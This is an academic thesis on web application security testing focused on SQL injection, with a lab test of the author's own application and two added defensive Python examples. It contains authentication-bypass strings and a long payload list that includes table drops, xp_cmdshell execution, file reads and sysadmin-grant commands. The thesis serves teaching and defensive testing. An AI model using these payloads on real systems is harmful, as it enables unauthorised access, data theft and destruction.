Security Testing on Web Application
Krishnan Kannoorpatti, Sami Azam
School of Engineering and IT
Faculty of EHSE
Charles Darwin University
The writing of this thesis has been one of the most important parts of my Software Engineering course. I would like to express sincere thanks to my supervisors Krishnan Kannoorpatti and Sami Azam for their constant support and guidance. I would also like to say special thanks to my unit coordinator Mirjam Jonkman, my course coordinator Charles Yeo, technical officer Balaji Iyyaswamy and librarian Bandana Koirala for all their support and for giving their precious time to help finish this thesis.
NAME: Tausif Yunusbhai Aghariya
COURSE TITLE: Master Of Information Technology
SPECIALISATION: Software Engineering
THESIS TITLE: Security Testing on Web Application
THESIS SUPERVISOR: Krishnan Kannoorpatti, Sami Azam
The approach taken to most web applications has been ad hoc, which raised the need for higher security standards, since considerable effort is required to keep an application meeting its quality standards. With existing and newer technologies such as ASP, VBScript and CGI, assessing the quality of a web application is hard because of the many factors that influence how a website performs. With data spread everywhere, and with users having minimal knowledge of how to protect it, the dark side of technology has devised its own path and now poses a serious threat to web security with a new set of vulnerabilities, chiefly SQL injection and cross-site scripting (XSS). Although earlier exploits such as buffer overflows existed, SQL injection and cross-site scripting vulnerabilities are instances of the broader class of input validation flaws, which have grown with changing business requirements. These input-validation-based vulnerabilities therefore require fundamentally new techniques to characterise and mitigate them. This dissertation focuses on how efficiently these web security vulnerabilities can be dealt with, addressing active issues primarily around SQL injection attacks. It then dissects the field of web applications to understand the vulnerable domains, and focuses on the approach that can be followed to address the exploits that vulnerabilities make possible and on the methodologies that can be used to give proper security to a web application.
Keywords: Web application, web application vulnerabilities, security testing, methods of security testing for web applications.
Problem Statement:
Vulnerabilities are still major security issues in web applications and cause many exploits.
Reason for Problem:
There are many reasons why vulnerabilities are still present in web applications. As mentioned above, developers today try to add more and more functionality to a web application. That means more code has to be written, which creates more coding errors and more opportunities for vulnerable code. Security testing methodologies and processes for web applications only emerged around 2001, so developers are not getting sufficient security testing training. Moreover, they give low priority to risk analysis. These are the reasons, based on my research, why vulnerabilities are still present in web applications.
Proposed Solution:
The preferred solution to this problem is to maintain the security standard of the web application by using suitable security testing methodologies, and to provide proper protection against the predictable vulnerabilities in web applications.
Overview of the Report:
This report is divided into four phases. The first phase introduces web applications: how a web application works and its architecture, why security is necessary for web applications, and the most prevalent web application vulnerabilities.
The second phase explains the SQL injection attack, reported as the second most common attack technique against web applications worldwide. It covers how SQL injection works, the types of SQL injection, and a practical implementation against a BCS web application in which the whole database is extracted using SQL injection techniques.
From the third phase onwards, the report explains security testing practice: the current state of security testing approaches, the different methodologies available for applying security testing during web application development, how Australian security standards for web applications are set, and how the security testing process can be used to protect the BCS web application that was compromised with SQL injection.
Tested Web Application:
The installation of the vulnerable web application was guided by my supervisors; I established a lab at CDU with the permission of the IT department, setting up my own server and domain in the lab. I installed the BSC PREDICTION web application as the target for my SQL injection testing methods, and used that lab for all my testing and thesis-related work. The example vulnerable code helps to illustrate the SQL injection vulnerability. The analysis clearly shows that the variable id is not filtered, so any input passes through it to the application. The given code is taken from my own application.
Table of Contents
1. Introduction to Web technology
2. Web application and its components
2.1 Database layer
2.2 Operational layer
2.3 User Interface layer
3. Security needs for Web Application
3.1 Financially motivated attacks
3.2 Ideology-driven attacks
3.3 Attack discovery and timeline
3.4 Top 10 incident discoveries on financially motivated attacks
4. Most prevalent web application security vulnerabilities
5. SQL Injection Attack
5.1 SQLi authentication bypass attack
5.2 Types of SQL Injection
5.2.1 Simple SQL injection attacks (Ping-Chen, 2011)
5.2.2 SQL injection in MySQL by using the URL method
5.2.3 SQL injection in MySQL by the blind injection method
6. History of web application security fields and practice
7. Web security with software engineering and design
7.1 Security Requirements
7.2 Secure Application Design and threat modelling
7.3 Develop with Secure Coding
7.4 Application Security Testing
8. Standards of Australian web security
8.1 Content Security Policy
8.2 HTTP Strict Transport Security
8.3 Cookie Security Enhancements
8.4 Input validation requirement standards
9. Current situation for security testing of web applications
10. Methodologies for securing web applications
10.1 Agile security testing
10.3 Open Web Application Security Project (OWASP)
11. Prevention of SQL injection attacks
12. Prevention of SQL injection attacks by using filters and techniques
12.1 SQL DOM
12.3 Input Validation
12.4 Session Management
12.5 Preventing injection in MySQL against the URL method attack
13. Analysis of web application code
13.1 Static Code Analysis with Polyspace Code Verifiers
13.2 Measuring Code Complexity and Checking with Coding Standards
13.3 Proving the Presence of Errors
13.4 Performing Impact Analysis
13.5 URL method for prevention of SQL Injection
14. Conclusion
List of Abbreviations
SQL Structured Query Language
XSS Cross-Site Scripting
CGI Common Gateway Interface
HTML HyperText Markup Language
HTTP HyperText Transfer Protocol
HTTPS HyperText Transfer Protocol Secure (HTTP over SSL/TLS)
UI Layer User Interface Layer
URL Uniform Resource Locator
CSS Cascading Style Sheets
OWASP Open Web Application Security Project
SDLC Security Development Life Cycle
MD5 Message Digest 5
API Application Programming Interface
XML Extensible Markup Language
UML Unified Modeling Language
SSL Secure Sockets Layer
ERP Enterprise Resource Planning
HSTC History of Science and Technology
1. Introduction to Web technology:
Gone are the days when the web was all about static pages (HTML was introduced as a static format: there were no form or input tags, and HTTP had no POST method) with little to no user interaction. It all started in 1993, when the Mosaic browser was released and extended HTML with ad hoc features such as lists, nested lists, inline pictures and fill-out forms, though it drew a lot of uncertainty because these features were not designed properly (Tajpour, Ibrahim & Sharifi, 2012). In the same year the Common Gateway Interface (CGI) was designed, which lets server-side scripts "dynamically generate HTML" from the given input. Shortly afterwards, Netscape 2.0 arrived with JavaScript and showed the world its possibilities; it is still helping to take the technology to the next level (Rothke, 2003). In 1997 Microsoft changed the face of the World Wide Web by introducing iframes in Internet Explorer, which led to a new wave of browser technology in which data could be loaded asynchronously, and Microsoft then pushed the "XMLHTTP" interface with the release of IE5 (Curphey & Arawo, 2006). This technology was slowly picked up by other browsers, which followed with "XMLHttpRequest". In the new millennium, from 2000, web applications entered a new phase with web application frameworks (Web 2.0, which allowed users to do more than just retrieve information), and a new era began. We call it the fundamental step because Web 2.0 created a platform for building highly interactive, user-centric web-aware applications (Ben-Natan, 2005). Without Web 2.0 the Internet would be extremely different from today: there would be no e-commerce (eBay, Flipkart, Amazon), webmail, Internet messaging, Internet banking, international share trading, forums or web communities (Twitter).
With the advent of Web 2.0, greater information sharing through networking communities, and the growing adoption of the web for business and for delivering software as a service, websites are often attacked directly because they stand as the face of the business (Bierman, Meijer & Schulte, 2005).
Figure- Web Application History (Owasp.org.au, 2015)
The present-day web is embraced by millions of small, medium and large businesses as an economical medium to communicate and exchange information with prospects and to transact with clients, partners and anyone else. Looking at the current situation, large web applications are being developed that have become unmanageable, with tangles of jQuery and application back-end code leading to flaws in the application (Alanazi & Sarrab, 2011).
2. Web application and its components:
A web application can be defined as a highly programmed environment that allows mass customisation through the immediate deployment of a large and diverse range of applications to billions of users across the globe. For the past ten years or more the web has played a vital role in many business transactions (Cross & Books24x7, 2007). It has been wholeheartedly accepted by millions of people and businesses and has become an inexpensive channel to communicate and exchange information.
In fact, the web provides a channel through which marketers can sell their products by advertising, analysing the number of people visiting their sites and communicating with them. People nowadays get their work done sitting right in front of their computer or mobile, and the reason behind this is the 'web application' (Doupé, Cova & Vigna, 2010). All the data regarding transactions, or anything else, has to be fetched, processed and stored somehow for further use, and this data can be retrieved through the web application via enquiry or login forms. Common examples of web applications include webmail, online banking and shopping sites, Google Docs and gaming sites (Antunes, Laranjeiro, Vieira & Madeira, 2009).
A web application generally comprises the following three layers:
The DATABASE layer (Model): where all the information is stored.
The OPERATIONAL layer (Controller): where the logic behind the application is written.
The UI layer (View): the interface through which users interact.
2.1 Database layer:
This layer stores all the information. It is an internal interface and is not exposed to the user. Database access calls are not made directly to the storage engine; instead, all database access is routed through the database layer. Data is structured into objects, these objects are stored in the form of tables, and the attributes of an object are stored as columns in the database.
The database layer is responsible for fetching, creating, updating and deleting (CRUD operations) individual records, attributes and values within records. Each database vendor provides its own interface tailored to its product, which leaves it to the application programmer to implement code for every database interface he or she wants to support. Database vendors include Oracle, SQL Server, MySQL, DB2 and PostgreSQL.
2.2 Operational layer:
This is the layer where the application's business logic is defined. It is solely responsible for handling user requests and rendering responses within the stipulated time with the aid of the database and UI layers. The operational layer can be treated as a manager who ensures that all the resources needed to complete a task are delegated to the proper layers. It waits for requests from clients, authenticates them, delegates data fetching or processing to the model, selects the data to be presented to the client and finally delegates rendering to the UI layer. This layer is commonly implemented in PHP, Perl or ASP.
2.3 User Interface layer:
This is the interface where user interaction happens. Whenever a user raises a request, the controller actions retrieve the data from the underlying database and render it to the HTML page or UI for the user to consume. This layer is not limited to HTML or any text representation of data; it can also deliver a wide variety of formats such as pictures, documents, videos and any other format the user asks for. It makes use of technologies such as HTML, CSS, JavaScript and its frameworks, and many more.
Figure: Architecture of web application (Antunes, Laranjeiro, Vieira,&Madeira,2009)
Finally, web applications can be defined as computer programs that allow users to retrieve data from, or submit data to, a database using their preferred web browser. Among the many advantages of web applications, one significant advantage is that they are platform independent. Web apps can be quickly deployed anywhere at no cost, and no installation is required at the user's end.
It is also important to understand that web applications generally work over HTTP, which functions as a "request-response" protocol in the client-server model. HTTP itself is stateless, so the application keeps track of a client through a session: the server stores the client's information and hands the browser an HTTP cookie carrying a session identifier that associates subsequent requests with that information. This cookie value is often termed the session hash; common practice is to make it an unguessable random or encrypted token and to keep the users' access information on the server, keyed by that token, rather than in the cookie itself.
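To make the session mechanism concrete, here is an added Python example (not code from the thesis or from the tested application) of how a server issues a session cookie and later resolves it back to the stored client information. The in-memory store, the cookie name sessionid and the helper names are assumptions chosen for the illustration; the cookie attributes are the ones a practitioner would set on a session cookie today.

```python
import secrets
from http.cookies import SimpleCookie

# Server-side session store: session id -> information about the client.
# A constructed in-memory stand-in for the database or cache a real app uses.
SESSIONS = {}

COOKIE_NAME = "sessionid"  # assumed cookie name for this illustration


def create_session(username):
    """Store the client's information server-side under a fresh, unguessable
    id. Only the id (the "session hash") travels to the browser; the user's
    data never leaves the server."""
    session_id = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    SESSIONS[session_id] = {"user": username}
    return session_id


def set_cookie_header(session_id):
    """Response header that hands the id to the browser. HttpOnly keeps
    page scripts (e.g. injected by XSS) from reading it, Secure limits it to
    HTTPS, and SameSite=Strict stops the browser attaching it to cross-site
    requests such as a CSRF attempt."""
    return "Set-Cookie: %s=%s; Path=/; HttpOnly; Secure; SameSite=Strict" % (
        COOKIE_NAME, session_id)


def session_from_cookie_header(cookie_header):
    """Parse the value of the browser's Cookie request header and resolve the
    id to the stored information. Returns None when the cookie is absent or
    the id is unknown (expired, forged or already logged out)."""
    jar = SimpleCookie()
    jar.load(cookie_header)
    morsel = jar.get(COOKIE_NAME)
    if morsel is None:
        return None
    return SESSIONS.get(morsel.value)


def destroy_session(session_id):
    """Logout: removing the server-side entry invalidates the id everywhere,
    so a copy stolen earlier stops working too. Returns True if it existed."""
    return SESSIONS.pop(session_id, None) is not None


if __name__ == "__main__":
    sid = create_session("alice")
    print(set_cookie_header(sid))
    print(session_from_cookie_header("%s=%s" % (COOKIE_NAME, sid)))
    print(session_from_cookie_header("%s=forged" % COOKIE_NAME))
```

The point of keeping the data server-side is that a forged or guessed id resolves to nothing, and a logout removes the entry so that even a previously stolen cookie no longer works; the cookie attributes limit how such a cookie can be stolen in the first place.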
3. Security needs for Web Application:
There is no doubt about it: the diverse techniques available to attackers have made defending web applications a herculean task. The SANS Institute rates Internet-facing websites that are vulnerable to attack as the second highest cyber security risk to enterprises (Bayles & Books24x7, 2007). Web applications are now the means to cost-effective business solutions and have proved to make business easy. For the same reason they are widely used across all sectors, including business, banking, finance, education, healthcare and technology (Bayles & Books24x7, 2007). Threats over the Internet are so poised that nothing on the web is considered safe. Online services integrated with web applications have grown at a very brisk pace with minimal to no attention paid to security, which has left many corporate sites vulnerable to attack.
Internet-facing websites and web applications are low-hanging fruit for attackers, because these applications handle so much data, including personally identifiable information and private data of the organisation and its clients. Many prominent organisations have fallen prey to hackers because they invest heavily in network security and little in web application security, which is almost like "buying good doors when the problem is with the windows" (Fong, Gaucher & Okun, 2008). A security breach can put everything at stake: it damages customer trust, reputation and revenue, and can also lead to legal liability. A website's functionality depends entirely on its web applications, which are programmed to capture, process, transmit and store personal and confidential information such as banking details, social security numbers and medical history. The other side of the attacks is not to steal the data in the application's database servers but to turn trusted websites into malicious ones used for client-side exploits (Razzaq, Hur, Farooq & Masood, 2012).
WhiteHat Sentinel, an organisation that assesses the largest e-commerce, healthcare and technology service firms, confirmed in its security statistics report that 83% of websites are prone to at least one severe vulnerability (Fonseca, Vieira & Madeira, 2007).
Web applications will remain the punching bags of the Internet. They are compromised in one of two ways: either by exploiting a weakness in the application or by impersonation with stolen credentials (McClure & Krüger, 2005).
Verizon's DBIR reports 3,937 recorded incidents, of which 490 were confirmed data disclosures. Two out of every three attacks were driven by the ideology and "lulz" of activist groups, while fewer than one in three were attributed to financially motivated attackers or to espionage.
3.1 Financially motivated attacks:
Every informational asset has some value, which for attackers is its hack value. Financially driven attacks aim at gaining access to money, and for that reason financial and retail organisations are their prime targets, because the data is as good as money (Shelly, 2010). In a financial industry or organisation the attacks are mostly aimed at gaining access to the web application, since this gives logical access to the money. This means that user credentials plus single-factor authentication achieve the attacker's desired result. There are many known and reported tactics for stealing credentials, but the usual ones are as follows (McClure & Krüger, 2005):
- Phishing techniques, which trick the user into supplying the credentials, or install malware to steal them.
- One of the oldest methods: password guessing attempts using brute-force techniques.
- The rarest of all, and the one that requires skill: directly targeting the application with SQL injection or other application-level attacks, or attacking the user management system itself to obtain user credentials and bypass authentication.
The retail industry suffers the majority of attacks aimed at payment card information, with 95% of the total reported incidents involving the theft of payment card information (Morgan, 2006). This information is often easily accessible by simply exploiting a web application or stealing saved credentials. Social engineering has also played, and still plays, an effective role, as this family of attacks works well enough. SQL injection continues to dominate web application attacks, reaching 80% in the retail industry, followed at 7% by techniques that install shells through local file inclusion (LFI) and remote file inclusion (RFI) (Meier & Meier, 2006).
Figure: External attacker motives over web-app attacks (categories: Espionage, Financial, Ideology/Fun) (McClure & Krüger, 2005)
3.2 Ideology-driven attacks:
These attacks represent identified motives for attacking web applications, with attackers based in different geographical locations. The majority of the attacks focus on truly exploiting the targets (Simpson, Backman & Corley, 2012).
The attacks are driven by different reasons, but ideological attackers are much less concerned with obtaining business data. The attacks seen are mainly defacements to send a message, or hijacking the server to attack others, which can even lead to cyber extortion. Web servers were the only assets targeted in most of the ideologically motivated attacks (Sarasan, 2013).
3.3 Attack discovery and timeline:
Within financially motivated attacks the discovery is recorded as an attack notification, often reported by the customer, who is frequently the first to notice such fraudulent activity. The graphs below show the discovery timeline with respect to attacks (Costa, Castro, Zhou, Zhang & Peinado, 2007).
3.4 Top 10 incident discoveries on financially motivated attacks
Top 5 attack discovery methods representing incidents based on ideologically based web application attacks (Fonseca, Vieira & Madeira, 2007).
Figure: Web-application attack chart, total external attacks versus total internal attacks (Owasp.org.au, 2015)
Figure: Attack notification by discovery method (Owasp.org.au, 2015): External - audit 1%; External - monitoring service 1%; External - law enforcement 2%; Internal - fraud detection 2%; Internal - reported by end user 2%; External - attacker disclosure 2%; External - unrelated party 3%; Internal - IT audit 4%; External - fraud detection 6%; External - customer 74%.
Figure: Discovery timelines (Owasp.org.au, 2015); each panel's axis is Seconds / Minutes / Hours / Days / Weeks / Months / Years / Never:
Panel (unlabelled): 19% / 42% / 12% / 23% / 0% / 5% / 0% / 0%
Panel (unlabelled): 3% / 27% / 21% / 21% / 18% / 9% / 0% / 0%
Exfiltration (n=33): 0% / 3% / 11% / 17% / 16% / 41% / 11% / 0%
4. Most prevalent web application security vulnerabilities:
"What we need is more secure web applications, not just more security-enabled applications." The most important task in any industry is to identify the vulnerabilities before an attacker does and to provide appropriate measures to safeguard the application and the organisation's reputation from attack (Insight Security Research (NISR) publication, 2002). Not only discovering the vulnerabilities but also estimating the associated business risk is equally important. Whatever security assessment methodologies an organisation uses in the application's development life cycle, security concerns may be found in the design or architecture, or even in the framework (Insight Security Research (NISR) publication, 2002). At a later stage, security issues may be found through secure code review or application security testing (penetration testing), or a weakness may go unidentified even after release until the application is compromised. According to WhiteHat Sentinel, in a survey of 76 organisations across different industries, the relationship between software security controls and software development life cycle behaviours on the one hand, and vulnerability outcomes and reported breaches on the other, is too complicated to draw any conclusion (Tajpour, Ibrahim & Sharifi, 2012).
Reports such as the Verizon Data Breach Investigations Report, the OWASP Top 10, WhiteHat Sentinel, the Symantec Threat Report, or essentially any other report in that context, focus on identifying the most severe risks for the organisation in different business areas. Any risk is evaluated based on security controls, threat agents and the business impact on the organisation. Business impacts are considered application/business specific, and threat agents are application specific; both depend on the details of the application in the context of the enterprise (Oehlert, 2005). The 2014 web application security reports almost all concluded by listing the same risks associated with attacks on web applications; the top 10 attack types are listed below by attack type and business impact (Howard, LeBlanc & Viega, 2010).
Figure: Discovery timeline panel (unlabelled) (Owasp.org.au, 2015), axis Seconds / Minutes / Hours / Days / Weeks / Months / Years / Never: 0% / 2% / 5% / 42% / 22% / 29% / 0% / 0%
Top 10 attacks and descriptions:
1. Injection: These flaws occur when untrusted data is passed to an interpreter as part of a command or query, tricking it into executing a command or query that grants the attacker access to data without proper authorisation.
2. Broken Authentication and Session Management: Application functions fail to address the core areas of authentication and session management, allowing attackers to compromise session cookies, tokens, passwords or keys and steal identities.
3. Cross-Site Scripting (XSS): A flawed application accepts untrusted data and sends it to the web browser without proper validation or escaping. XSS lets attackers execute scripts in the victim's browser, which can hijack the victim's session, deface websites or redirect the victim to malicious sites.
4. Insecure Direct Object References: Developers expose a reference to an internal implementation object, such as a file, a directory or a database key. Without proper access controls or other protection, these flaws allow attackers to manipulate references to access unauthorised data.
5. Security Misconfiguration: Security can only be achieved with robust security configurations for the application, its frameworks, the servers on which it is installed and the associated web and database servers. As default settings tend to be insecure, proper security settings must be defined, implemented, maintained and, above all, kept updated.
6. Sensitive Data Exposure: Most present-day web apps handle corporate, private or personal data that is considered sensitive, and may not have proper security controls enforced. This allows attackers to steal the data for identity theft, credit card fraud and similar crimes.
7. Missing Function Level Access Control: Web applications undergo functional testing before a full-fledged user interface is built, but access control checks must also be performed on the server whenever a function is accessed. If requests are not thoroughly verified, attackers can forge requests to reach functionality they are not authorised for.
8. Cross-Site Request Forgery (CSRF): A CSRF attack forces a logged-in victim's browser to send forged HTTP requests, which automatically include the victim's session cookie and any other authentication information, to a vulnerable web application. The vulnerable application treats these requests as legitimate requests from the end user.
9. Using Components with Existing Vulnerabilities: Using external libraries, frameworks or any software module in application development enhances functionality and features but also increases the chance of being vulnerable. When a vulnerable component is exploited, it can aid an attacker in data theft or application takeover, and exposes the application to a wide range of attacks with the associated business impact.
10. Malicious Redirects and Forwards: Present-day web applications perform URL redirects when determining the destination page. Without proper validation, attackers redirect users to their phishing sites or use page forwarding to gain unauthorised access to protected pages.
5. SQL Injection Attack
Web applications have become more sophisticated and increasingly complex in their architecture. Their existence has given a new dimension to e-commerce and the ERP industry, which is clearly visible today as we are all end users of these applications. With the availability of these enterprise systems, the sensitive data they store, handle and process has become critical to all major industry sectors, not only e-commerce (Bayles & Books24x7, 2007).
SQL injection attacks belong to the family of injection attacks. SQL, generally pronounced "sequel", stands for Structured Query Language and is used specifically for querying databases (Antunes & Vieira, 2009). SQL injection is considered the most common application-layer attack, multifaceted and dominant. These attacks are only possible when the target application has a back-end database, improper coding and no proper control over input validation. Successful exploitation of this weakness allows the attacker to read and modify (insert, update, delete) sensitive data, and can provide administrative access to the database, making operations such as shutting down or taking ownership of the database possible (Cross & Books24x7, 2007). Because of the ubiquity of SQL across platforms and databases, the attack is portable. To carry out this family of attacks one needs considerable knowledge of client-server technologies, web applications and databases, and also patience (Portland, 2013).
Below is the table provided by Razzaq, Hur, Farooq & Masood (2012), explaining the attack vectors and impacts of the SQL injection attack.
Threat agents (application specific): Any data given as input is considered untrusted, including data from internal or external clients or administrators.
Attack vectors (exploitability: easy): Attackers send specially crafted text that tricks the interpreter, irrespective of the source of the data, which can even come from internal sources.
Security weakness (prevalence: common; detectability: moderate): Injection attacks arise when a web application passes crafted data to an interpreter. These flaws are quite common and most often cited in legacy code. They are hard to discover through functional testing but can easily be identified by code examination, and present-day scanners have made injection flaws easy to detect.
Technical impact (severe): Successful exploitation of these flaws can lead to loss of ownership of the machine, as they can give the attacker administrative access.
Business impact (application/business specific): All accessible data can be stolen, modified or even corrupted, which ultimately puts reputation at stake.
Attacks which use SQL injection targets those websites or web-applications which allows to submit data and retrieve the data from the databases over the internet. Databases are playing a vital role in the functioning of modern day websites or web-applications as they store the data required for the web sites or applications to render its services by providing appropriate content to its authorized customers, stakeholders and employees(Cross, & Books24x7,2007). Data associated to end-user credentials, banking information, companies’ proprietary information may reside in the database and can be accessed by authorised users via customized or off-the-shelf applications.
SQL injection attacks are performed by crafted SQL codes which are appended or inserted into the web application as user input parameters which tricks the interperter and and executes itself in the form of queries to the database. Any system that constructs the SQL Queries might be vulnerable, SQL as a language for specifically constructing queries to the databases will provide a diversified coding options(Dharam, Shiva,2014).
Based on the application's functioning and processing of user-supplied data, SQL injection can be used to perform the following types of attacks (Doupé, Cova & Vigna, 2010):
Authentication Bypassing: Using this attack, an attacker logs onto an application without providing a valid username and password and gains administrator privileges.
Information Disclosure: Using this attack, an attacker can obtain sensitive information that is stored in the database.
Compromised Data Integrity: An attacker uses this attack to deface a website or web page, insert malicious content into web pages, or alter the contents of a database.
Compromised Availability of Data: Attackers use this attack to delete database information, or to delete log or audit information that is contained in a database.
Remote Code Execution: It allows an attacker to compromise the host operating system.
Example of a small, basic SQL injection vulnerability:
Let's consider an example of a web application hosted by a bookstore to make its service available to customers online.
5.1 SQLi Bypass Authentication Attack:
When a customer searches for all books in the store published by some publisher XYZ, the application performs the query below (Shar & Tan, 2013):
Select Author, Book_name, published_year from bookstore where publisher = 'XYZ'
Now consider a customer who searches for books published by T'XYZ. The application then performs the query below.
Select Author, Book_name, published_year from bookstore where publisher = 'T'XYZ'
Server error message (incorrect syntax):
Unclosed quotation mark before the character string
Note: When an application behaves this way, we can say it is open to SQLi attacks.
This flaw allows an attacker to manipulate the query so that it retrieves information on every book in the bookstore, using the string below:
XYZ' or 1=1--
Inserting the crafted string above into the query gives an unintended result:
SELECT Author, Book_name, Published_year from bookstore where publisher = 'XYZ' or 1=1--'
Since 1 always equals 1, the condition is always true and the database retrieves every book in the bookstore table.
Note: "--" (double hyphen) in SQL tells the interpreter to ignore the rest of the line after it as a comment. In MySQL, however, "--" must be followed by a space, or "#" can be used instead to mark a comment.
In certain instances a very small and simple SQL injection flaw can have an immediate critical impact. Most applications run with a form-based login function: the application stores the users' authentication information (credentials) in a database and performs a SQL query to verify each login attempt made by a user. Below is a small example of such a query:
SELECT * from users where username = 'JOHN' and passwd = 'NHOJ'
An attacker can inject a crafted request either in the username field or in the password field to alter the query to suit his own needs. Assume, for instance, that the attacker knows the application's administrator username is "administrator". Knowing the username, he can log in as admin just by supplying any password and a username of the following form:
With admin'-- as the username, the query becomes: select * from users where username = 'admin'--' AND passwd = 'abcdef'
With the comment symbol before the password, the part of the query that validates the password is bypassed.
If the attacker does not know the administrator's username, the following may help him gain access:
- In most applications, the first account in the database is the admin user, as this account is used to create the other accounts in the application.
- Further, if the submitted query returns more than one user, many applications simply process the details of the first user.
An attacker can therefore often log in to the application as the first user in the database by passing the following string as the username:
' OR 1=1--
This makes the application perform the following query:
SELECT * from users where username = '' OR 1=1--' AND password = 'abcde'
- In most cases, a SQL injection vulnerability can be identified and verified simply by passing a single untrusted input into the application.
Below are snapshots of the testing which I did in my lab on the BCS web application, which was developed by me; I used that web application for testing.
The user fills out the login form like this: Login: ' OR ''='
Password: ' OR ''='
This gives SQLQuery the following value:
SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''
Instead of comparing the user-supplied data with that present in the Users table, the query compares '' (nothing) to '' (nothing), which, of course, will always return true.
We can see in the snapshot that I filled in the username as ' OR ''=' and the password as ' OR ''='. As the snapshot below shows, the user can enter the main page by using the authentication-bypass method of SQL injection.
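As an added example (not code from the thesis or from the BCS application), the login query above in its concatenated form beside a parameterized form, run against a constructed in-memory SQLite table; the account data and the use of SQLite in place of MySQL are assumptions of this example.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory Users table with two accounts,
    the admin being the first row, as the thesis notes is common."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "s3cret-admin"), ("JOHN", "NHOJ")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, as the thesis's vulnerable
    login does: whatever the user types becomes part of the SQL text."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Hardened form: placeholders bind the input as data, so quotes and
    comment markers in it can never change the statement's structure."""
    sql = "SELECT Username FROM Users WHERE Username = ? AND Password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def single_quote_probe(login_fn, conn):
    """The thesis's first detection step: submit a lone quote (T'XYZ) and see
    whether the statement breaks. 'error' means the input reached the SQL
    parser unescaped; 'ok' means it was handled as data."""
    try:
        login_fn(conn, "T'XYZ", "irrelevant")
        return "ok"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", login_vulnerable),
                     ("parameterized", login_parameterized)):
        print(name, "quote probe      ->", single_quote_probe(fn, db))
        print(name, "' OR ''=' bypass ->", fn(db, "' OR ''='", "' OR ''='"))
        print(name, "admin'-- bypass  ->", fn(db, "admin'--", "anything"))
        print(name, "valid login      ->", fn(db, "JOHN", "NHOJ"))
```

SQLite accepts "--" without a trailing space; for MySQL the note above about "-- " applies.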
- There may even be instances where the flaws are very subtle and hard to distinguish from other categories of vulnerability, or from small security weaknesses that do not pose any threat (Cross & Books24x7, 2007).
Note: With applications that access a back-end database, it is quite important to verify URL parameters, POST data handled by the application, HTTP headers and cookies.
Attack characters                 Description
' or "                            Character string indicators
-- or #                           Single-line comment
/*...*/                           Multiple-line comment
?parameter1=xyz&parameter2=123    URL parameters
PRINT                             Useful as a non-transactional command
@variable                         Local variable
@@variable                        Global variable
In order to successfully exploit any SQL injection vulnerability it is necessary to break out of the quotes, as the input passed by the end user is incorporated into a SQL command and the input is placed in single quotes (Cross & Books24x7, 2007).
Detect SQL Injection Issues: Try passing a single quote as an unexpected input character and observe whether any error, or any other change in the result, reveals where exactly the user-supplied input is not sanitized.
If an error or strange behaviour is observed, pass a second single quote, meaning two single quotes together. It is a known fact that databases use a pair of single quotes as an escape sequence: here it is interpreted as a quote character inside the string and not as the closing string terminator. If the result is now error free, or the strange behaviour disappears, then the application is most likely vulnerable to injection attacks (Anley, 2007).
To confirm the existence of an injection flaw, use the database's string concatenation characters to craft a string. If the application responds to the crafted input with the expected output, the application is said to be vulnerable. Every database uses its own method of string concatenation.
Detect Input Sanitization:
Use the right square bracket (the ] character) as an input character to verify where exactly the given input is being used as a SQL identifier without any sanitization.
Detecting Truncation Issues:
Pass lengthy strings of unexpected data into the application, in the same way we submit normal input, to check for any instance of buffer overflow. These actions may throw SQL errors on the page if the application is vulnerable.
Database type    String concatenation characters
MySQL            ' ' (space between two single quotation marks)
- To confirm whether the application is accessing a database, use "%" (a wildcard character) in the input.
- Submitting the wildcard character % in a search field will often produce many results, which indicates that a SQL query was executed in the associated database.
Testing for SQL Injection Weakness (Mirdula & Manivannan, 2013):
Testing string variations (one test string per line):
' (single quote)
1' or '1'='1
1') or ('1'=1
Value' or '1'='2
Value') or ('1'='2
1' and '1'='2
1') and ('1'='2
1' or 'ab'='a'+'b
1') or ('ab'='a'+'b
1' or 'ab'='a''b
1') or ('ab'='a''b
1' or 'ab'='a'||'b
1') or ('ab'='a'||'b
';[SQL query];--
');[SQL query];--
';[SQL query];#
');[SQL query];#
;[SQL query];--
);[SQL query];--
;[SQL query];#
);[SQL query];#
'; drop table users--
1+1
3-1
Value+0
1 or 1=1
1) or (1=1
Value or 1=2
Value) or (1=2
1 and 1=2
1) and (1=2
1 or 'ab'='a'+'b'
1) or ('ab'='a'+'b'
1 or 'ab'='a''b'
1) or ('ab'='a''b'
1 or 'ab'='a'||'b'
1) or ('ab'='a'||'b'
1 or 1=1--
1) or 1=1--
' or '1'='1'--
') or '1'='1'--
-1 and 1=2--
-1) and 1=2--
' and '1'='2'--
') and '1'='2--
1/*...*/
||6
or 1=1--
%22+or+isnull%281%2F0%29+%2F*
'||'6
" or "a"="a
' group by userid having 1=1--
(||6)
Admin' OR '
'; Execute immediate 'SEL' || 'ECT US' || 'ER'
' OR 1=1--
' having 1 = 1--
CREATE USER name IDENTIFIED BY 'pass123'
OR 1=1
' OR 'text' = N'text'
'union select 1, load_file('/etc/password'),1,1,1;
' OR '1'='1
' OR 2 > 1
';exec master..xp_cmdshell 'ping 10.10.1.2'
; OR '1'='1'
' OR 'text' > 't'
';exec sp_addsrvrolemember 'name' ,'sysadmin'
%27+--+
' union select
GRANT CONNECT TO name; GRANT RESOURCE TO name
" or 1=1--
Password: */=1--
' union select * from users where login = char(114,111,111,116)
' or 1=1 /*
' or 1/*
'/**/OR/**/1/**/=/**/1
UNI/**/ON SELECT
' or 1 in (select @@version)--
';EXEC ('SEL' + 'ECT US' +'ER')
' union all select @@version
+or+isnull%281%2F0%29+%2F*
' OR 'unusual' = 'unusual'
' and 1 in (select var from temp)--
' OR 'something' = 'some'+'thing'
'; drop table temp--
' OR 'something' like 'some%'
Exec sp_addlogin 'name','password'
' OR 'whatever' in ('whatever')
@var select @var as var into temp end--
' OR 2 BETWEEN 1 and 3
' or username like char(37)
